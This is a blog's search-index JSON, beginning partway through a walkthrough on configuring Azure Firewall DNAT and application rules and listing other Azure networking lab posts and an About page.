rdp-nat Source type: IP Address Source: * Protocol: TCP Destination Ports: 3389 Destination Type: IP Address Destination: 20.228.240.135 (this is the public IP address of the firewall) Translated address: 10.0.2.4 (this is the internal/private IP address of the workload server VM) Translated port: 3389\nFig32. Add Rule Collection and Rule for Destination Network Address Translation (DNAT) Click on Add to add this rule collection and DNAT rule to the policy of the firewall resource. It will appear similar to the following:\nFig33. Verification of configured Destination Network Address Translation Rule (DNAT) We can view each of our configured rule collections by clicking on Rule collections under the Settings section of the firewall policy resource.\nFig34. Verification of Configured Rule Collections on the Firewall Policy Change the primary and secondary DNS address for the server’s network interface\nFor testing purposes in this exercise, we will configure the Srv-Work server’s primary and secondary DNS addresses with custom addresses. We can do this by navigating to the network interface of the Srv-Work virtual machine. Under Settings, select DNS servers. Under DNS servers, select Custom. Type 209.244.0.3 in the Add DNS server text box, and 209.244.0.4 in the next text box. Click on SAVE to accept the new settings.\nFig35. Configure custom DNS servers for Srv-Work virtual machine Clicking back into the configured DNS servers page, we observe at the bottom of this screen that these settings have been applied to the NIC of the Srv-Work virtual machine.\nFig36. Verification of Custom DNS servers Task 7: Test the firewall Finally, it is time to test the firewall rules that we have configured for this deployment. We will begin by launching the Remote Desktop Connection tool from our PC. We will enter the public IP address of the firewall, in my case it is 20.228.240.135. On the prompt, enter the admin account credentials that you configured when you deployed the workload server VM, then click on OK.\nFig37. Initiating RDP Connection to the Firewall’s Public IP Address Next, you will be prompted about a certificate for the workload server VM, Srv-Work. Click on “Yes” to proceed. A successful connection to the workload VM proves that our configured DNAT rule is working as expected and is translating our firewall’s Public IP address to that of the internal/private IP address of the Svr-Work VM.\nFig38. Confirm Connect Request to Srv-Work VM Once we are logged into the Srv-Work virtual machine, we need to launch the web browser so that we can test whether or not we will be permitted to access www.google.com site. Here, we can see that the firewall rule worked as expected to allow this communication. Remember, anything that is not explicitly permitted by a rule will be denied by default when using a firewall. The Application rule that we configured for Allow-Google is allowing this outbound traffic to Google.\nFig39. Testing Firewall Application Rule for Allow-Google In this next test, I tried to navigate to www.microsoft.com in the web browser and was presented with the following feedback. This connection was denied by the firewall because we did not configure an explicit rule to allow connections from our subnet to communicate with this FQDN.\nFig40. Testing Firewall Application Rule for Connection to Microsoft.com This concludes the demonstration on how to deploy a firewall policy with rules for allowing or denying outbound traffic from Azure. Please stick around for more because I have more firewall labs coming up in my next few articles!\nThank you for reading!\nReferences:\n","date":"December 4, 2022","permalink":"https://notesbynisha.com/posts/2022-12-04-deploy-configure-azure-firewall/","section":"Writing","summary":"\u003ch2 id=\"deploy-and-configure-azure-firewall-and-rules-to-allowdeny-access-to-certain-websites\" class=\"relative group\"\u003eDeploy and Configure Azure Firewall and Rules to Allow/Deny Access to Certain Websites \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#deploy-and-configure-azure-firewall-and-rules-to-allowdeny-access-to-certain-websites\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cfigure\u003e \n\u003cimg src=\"/assets/images/mainimage.jpg\"\u003e\n  \u003cfigcaption\u003eFig.1 - Azure Premium Firewall Diagram | Image Source: Microsoft.com\u003c/figcaption\u003e\n\u003c/figure\u003e\n\u003cp\u003eThe \u003ca href=\"https://learn.microsoft.com/en-us/azure/firewall/overview\"\u003e Azure Firewall \u003c/a\u003e is a fully managed cloud-native service that provides network security to protect your Azure virtual network resources. The service offers built-in high availability, unrestricted scalability, threat intelligence-based filtering, logging and monitoring, and many more features and capabilities.\u003c/p\u003e","title":"Deploy and Configure Azure Firewall and Rules to Allow/Deny Access to Certain Websites"},{"content":"Deploy Azure Application Gateway to Direct Web Traffic #","date":"November 13, 2022","permalink":"https://notesbynisha.com/posts/2022-11-13-deploy-azure-application-gateway-to-direct-web-traffic/","section":"Writing","summary":"\u003ch2 id=\"deploy-azure-application-gateway-to-direct-web-traffic\" class=\"relative group\"\u003eDeploy Azure Application Gateway to Direct Web Traffic \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#deploy-azure-application-gateway-to-direct-web-traffic\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e","title":"Deploy Azure Application Gateway to Direct Web Traffic"},{"content":"Create Inbound NAT Rules to Connect to a Single VM in Azure (Port-Forwarding) #","date":"November 7, 2022","permalink":"https://notesbynisha.com/posts/2022-11-07-creating-inbound-nat-rules-to-connect-to-a-single-vm-in-azure-port-forwarding/","section":"Writing","summary":"\u003ch2 id=\"create-inbound-nat-rules-to-connect-to-a-single-vm-in-azure-port-forwarding\" class=\"relative group\"\u003eCreate Inbound NAT Rules to Connect to a Single VM in Azure (Port-Forwarding) \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#create-inbound-nat-rules-to-connect-to-a-single-vm-in-azure-port-forwarding\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e","title":"Create Inbound NAT Rules to Connect to a Single VM in Azure (Port-Forwarding)"},{"content":"Configure Azure Load Balancer #","date":"October 31, 2022","permalink":"https://notesbynisha.com/posts/2022-10-31-configure-azure-load-balancer/","section":"Writing","summary":"\u003ch2 id=\"configure-azure-load-balancer\" class=\"relative group\"\u003eConfigure Azure Load Balancer \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#configure-azure-load-balancer\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e","title":"Configure Azure Load Balancer"},{"content":"Traffic Routing in Microsoft Azure with Network Virtual Appliacne (NVA) #","date":"October 26, 2022","permalink":"https://notesbynisha.com/posts/2022-10-26-traffic-routing-in-microsoft-azure-with-subnet-to-network-virtual-appliance-nva/","section":"Writing","summary":"\u003ch2 id=\"traffic-routing-in-microsoft-azure-with-network-virtual-appliacne-nva\" class=\"relative group\"\u003eTraffic Routing in Microsoft Azure with Network Virtual Appliacne (NVA) \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#traffic-routing-in-microsoft-azure-with-network-virtual-appliacne-nva\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e","title":"Traffic Routing in Microsoft Azure with Network Virtual Appliacne (NVA)"},{"content":"Create a Site-to-Site (S2S) VPN Connection in Microsoft Azure #","date":"October 16, 2022","permalink":"https://notesbynisha.com/posts/2022-10-16-create-a-site-to-site-s2s-vpn-connection-in-azure/","section":"Writing","summary":"\u003ch2 id=\"create-a-site-to-site-s2s-vpn-connection-in-microsoft-azure\" class=\"relative group\"\u003eCreate a Site-to-Site (S2S) VPN Connection in Microsoft Azure \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#create-a-site-to-site-s2s-vpn-connection-in-microsoft-azure\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e","title":"How to Create Site-to-Site VPN Connections in Microsoft Azure"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/vpn/","section":"Tags","summary":"","title":"VPN"},{"content":"How to Create Point-to-Site VPN Connections in Microsoft Azure # Creating Azure Point to Site VPN Connections\n","date":"September 16, 2022","permalink":"https://notesbynisha.com/posts/2022-09-16-creating-azure-point-to-site-vpn-connections/","section":"Writing","summary":"\u003ch2 id=\"how-to-create-point-to-site-vpn-connections-in-microsoft-azure\" class=\"relative group\"\u003eHow to Create Point-to-Site VPN Connections in Microsoft Azure \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#how-to-create-point-to-site-vpn-connections-in-microsoft-azure\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003e\u003ca href=\"https://faun.pub/creating-azure-point-to-site-vpn-connections-24033cc4d2e5\"\u003e Creating Azure Point to Site VPN Connections\u003c/a\u003e\u003c/p\u003e","title":"How to Create Point-to-Site VPN Connections in Microsoft Azure"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/cloud/","section":"Categories","summary":"","title":"Cloud"},{"content":"Introduction #Well, I am just having loads of fun! 😄 The Azure VPN Gateway has now entered the scene and with it we are presented with so many additional options for establishing connectivity between our Azure virtual networks and our on-premises networks.\nWhile VNet Peering can provide us with one solution for bridging our VNets to allow communication across Azure-to-Azure virtual networks, there are some differences in the capabilities of VNet Peering versus VNet-to-VNet connections that should be considered when making decisions about Azure V-Nets and hybrid networking solution needs.\nBy deploying a VPN Gateway into a dedicated GatewaySubnet of our virtual networks, we can create one or more encrypted tunnel connections between the VPN Gateway of our Azure VNet and any of the following:\nOther virtual networks (VNet-to-VNet connections) Our on-premises VPN device (Site-to-Site connections) The client devices of our remote workers (Point-to-Site connections) The VPN Gateway can be combined with other Azure networking services to provide more advanced solutions, such as functioning as a Gateway Transit to support routing in a Hub and Spoke network topology. It supports multiple protocols and offers various bandwidth speeds and high availability, subject to the selected Gateway SKU.\nOver the weekend, I had an opportunity to lab up each of these different VPN Gateway connection types (with limitations) using the Azure Portal. In this article, I discuss how I was able to bridge the connection between my two Azure Virtual Networks by creating a VNet-to-VNet connection using VPN Gateways (tutorial source: Microsoft.com). The steps were:\nCreating and configuring VNet1 Creating the VNet1 gateway Creating and configuring VNet4 Creating the VNet4 gateway Configuring the VNet1 gateway connection Configuring the VNet4 gateway connection Verifying the connections Step 1: Create and Configure VNet1 and VPN Gateway 1 #In the first step, I created the first virtual network, VNet1, in the TestRG1 Resource Group, located in the East US Azure Region.\nConfiguration of VNet1 #Next, I configured the IP addressing for the network, assigning it a network address space and a FrontEnd subnet from this space.\nWith VNet1 in place, I deployed a VPN Gateway to a dedicated GatewaySubnet. Microsoft recommends using a CIDR /27 block for future scalability. This gateway is of type VPN and Route-Based. I did not enable any HA or BGP options.\nThe gateway SKU selected was one of the more affordable options, offering lower bandwidth throughput compared to higher-tier SKUs.\nStep 2: Create and Configure VNet4 and VPN Gateway 4 #After completing VNet1, I configured VNet4, located in the West US Azure Region.\nConfiguration of VNet4 #I configured the address space for VNet4 and added a FrontEnd subnet range from this space.\nThen, I deployed a Route-Based VPN Gateway to the GatewaySubnet within VNet4.\nAt this point, both VNet1 and VNet4 had fully configured VPN Gateways.\nStep 3: Configure the Gateway Connections #This phase involved setting up the VNet-to-VNet connections from each VPN Gateway.\nFrom VNet1GW, I created a connection to VNet4GW (the remote gateway). I entered a Shared Key—this key must match on both ends. The tunneling protocol selected was IKEv2, known for speed and reliability.\nThen, I configured the VNet4GW connection to point back to VNet1GW, using the same Shared Key and IKEv2 protocol.\nStep 4: Verify Connectivity #I verified that the connection status showed \u0026ldquo;Connected\u0026rdquo; on both sides:\nFrom the perspective of VNet4 And from the perspective of VNet1 Final Thoughts #I enjoyed configuring the VPN Gateways and the VNet-to-VNet Connection for both virtual networks in this lab. It was fairly simple and informative. I also appreciated learning more about the capabilities that VPN Gateways enable for communication between Azure VNets and on-prem networks in hybrid cloud environments.\nThank you for reading!\nReferences # VPN Gateway documentation Configure a VNet-to-VNet VPN gateway connection: Azure portal If this post was helpful, please consider sharing it! 🚀\n","date":"September 11, 2022","permalink":"https://notesbynisha.com/posts/2022-09-11-vnet-to-vnet-connections-in-azure/","section":"Writing","summary":"This walkthrough details how to create secure VPN Gateway connections between two Azure Virtual Networks using VNet-to-VNet tunneling. Learn how to configure VPN Gateways, establish encrypted connections, and verify the status—all from the Azure portal.","title":"Creating VNet-to-VNet Connections in Microsoft Azure"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/vnet/","section":"Tags","summary":"","title":"VNet"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/vpn-gateway/","section":"Tags","summary":"","title":"VPN Gateway"},{"content":"Hi, I\u0026rsquo;m Nisha — a cybersecurity engineer who loves learning all things technology and writing about it along the way.\nNotes by Nisha is where I keep my working notes: cloud security, offensive and defensive tradecraft, hands-on lab walkthroughs, and the occasional deep dive into whatever I\u0026rsquo;m currently obsessed with. If it taught me something, it probably ends up here.\nCome say hi or follow along:\nGitHub LinkedIn YouTube ","date":null,"permalink":"https://notesbynisha.com/about/","section":"Notes by Nisha","summary":"\u003cp\u003eHi, I\u0026rsquo;m Nisha — a cybersecurity engineer who loves learning all things\ntechnology and writing about it along the way.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eNotes by Nisha\u003c/strong\u003e is where I keep my working notes: cloud security,\noffensive and defensive tradecraft, hands-on lab walkthroughs, and the\noccasional deep dive into whatever I\u0026rsquo;m currently obsessed with. If it taught\nme something, it probably ends up here.\u003c/p\u003e","title":"About"}]